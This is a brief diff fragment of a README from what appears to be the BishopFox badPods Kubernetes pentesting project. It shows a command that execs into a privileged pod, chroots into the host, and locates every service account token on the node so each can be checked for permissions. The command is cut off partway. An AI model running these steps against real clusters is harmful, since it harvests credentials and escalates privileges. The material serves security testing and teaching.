BishopFox/badPods/manifests/everything-allowed/README.md

 ```

 **Run kubectl can-i --list against ALL tokens found on the node**

-Run this where you have kubectl installed
+*Run this where you have kubectl installed, and NOT from within the priv pod.*

 ```
 tokens=`kubectl exec -it everything-allowed-exec-pod -- chroot /host find /var/lib/kubelet/pods/ -name token -type l`; \
 for filename in $tokens; \